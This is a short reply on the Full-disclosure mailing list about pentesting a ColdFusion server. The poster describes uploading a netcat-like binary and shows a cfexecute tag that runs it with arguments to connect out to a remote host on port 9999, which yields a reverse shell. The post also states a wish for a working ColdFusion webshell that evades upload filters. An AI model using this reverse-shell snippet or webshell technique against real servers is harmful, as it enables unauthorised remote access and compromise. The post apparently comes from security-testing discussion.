Re: [Full-disclosure] coldfusion pentest

thx :)

the script from securiteam was from Kurt Grutzmacher originally,it could not
run in my box

and Im successful got a working shell by uploading a nc like tool and use the
following script to run it

<cfexecute name="D:\haha.exe"
                 arguments="-connect 1.1.1. 9999"
                 timeout="20">
      </cfexecute>

no matter how,I thought many guys who like me need a working cf
webshell,because the upload script do not allow us to upload exe or some other
kinds of files